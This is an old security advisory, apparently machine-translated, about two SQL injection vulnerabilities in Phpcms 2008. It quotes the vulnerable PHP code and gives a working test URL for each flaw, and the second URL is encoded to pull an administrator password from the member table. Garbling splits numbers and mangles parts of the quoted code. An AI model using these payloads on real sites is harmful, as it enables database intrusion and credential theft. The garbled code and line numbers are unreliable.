Phpcms 2 0 0 8 two SQL injection vulnerabilities-vulnerability warning-the black bar safety net

2010-10-19T00:00:00
ID MYHACK58:62201028142
Type myhack58
Reporter 佚名
Modified 2010-10-19T00:00:00

Description

Phpcms is a leading web content management system, but also is an open-source PHP development framework.

SQL injectiona

In the file api/space. api. php: $arr_content = $content->listinfo("userid='$userid'", $order, 1, 1 0); //line 7 Listinfo function in the file include/admin/ content. class. php: function listinfo($where = ", $order = "listorderDESC,contentidDESC', $page = 1, $pagesize = 5 0) //first 1 6 9 row { if($where) $where = "WHERE $where $this->userid_sql"; if($order) $order = "ORDER BY $order"; ...... $result = $this->db->query("SELECT * FROM$this->table` $where $order $limit"); //No. 1 7 9 row The variable$order is not initialized and put into the sql statement, leading to injection vulnerabilities.

Test method:

This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! http://site/api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%2 3

SQL injectionII

In the file the ask/query. php: case 'edit_answer': //paragraph 3, line 9 if($dosubmit) { if(strlen($answertext) > 1 0 0 0 0) showmessage('answer the number of words cannot exceed 1 0 0 0 0 characters'); $posts['message'] = $M['use_editor'] ? $answertext : strip_tags($answertext); $answer->edit($pid, $posts, $_userid); $answer->edit in the file ask\include\answer. class. php: function edit($id, $posts, $userid) //the 1 0 line 9 { $id = intval($id); $userid = intval($userid); if(!$ id ! is_array($posts)) return false; if($userid) $sql = "AND userid=$userid"; return $this->db->update($this->table_posts, $posts, "pid=$id $sql"); } db->update in the file include/ db_mysql. class. php code: function update($tablename, $array, $where = ") //8th row 3 { if($where) { $sql = "; foreach($array as $k=>$v) { $sql .= ", $k='$v'"; } $sql = substr($sql, 1); $sql = "UPDATE $tablename SET $sql WHERE $where"; The array variable$posts is not initialized, leading to injection vulnerabilities.

Test method:

This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk! http://site/ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%6 5%7 3%7 3%6 1%6 7%6 5%6 0%3D%2 8% 7 3% 6 5%6C%6 5%6 3%7 4%2 0%7 0%6 1%7 3%7 3%7 7%6F%7 2%6 4%2 0%6 6%7 2%6F%6D%2 0%7 0%6 8%7 0%6 3%6D%7 3%5F%6D%6 5%6D%6 2%6 5%7 2%2 0%7 7%6 8%6 5%7 2%6 5%2 0 %6 7%7 2%6F%7 5% 7 0% 6 9% 6 4%3D%3 1%2 9%2 0%7 7%6 8%6 5%7 2%6 5%2 0%6 1%7 3%6B%6 9% 6 4%3D%3 2% 2 3]

Solution: initialize the array variable$posts